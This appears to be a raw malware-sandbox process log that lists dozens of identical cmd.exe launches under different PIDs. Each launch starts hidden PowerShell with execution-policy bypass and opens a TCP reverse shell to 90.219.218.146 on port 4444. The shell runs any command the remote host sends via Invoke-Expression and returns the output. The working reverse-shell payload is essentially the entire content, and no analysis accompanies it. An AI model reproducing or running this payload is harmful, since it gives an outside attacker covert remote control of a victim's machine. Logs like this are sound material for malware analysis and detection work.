C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:3744
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:5052
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:3260
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:1496
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:3236
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:3024
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:4948
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:2356
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:4044
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:1420
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:1476
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:4872
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:2396
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:5000
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:4712
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:3500
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:3948
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:1600
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:1864
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:2036
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:3940
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:1092
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:1000
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:2240
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:2632
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:3008
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:1416
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:2720
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:1728
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:1480
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:540
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:2844
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:2768
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:4528
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:224
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:2532
-
-
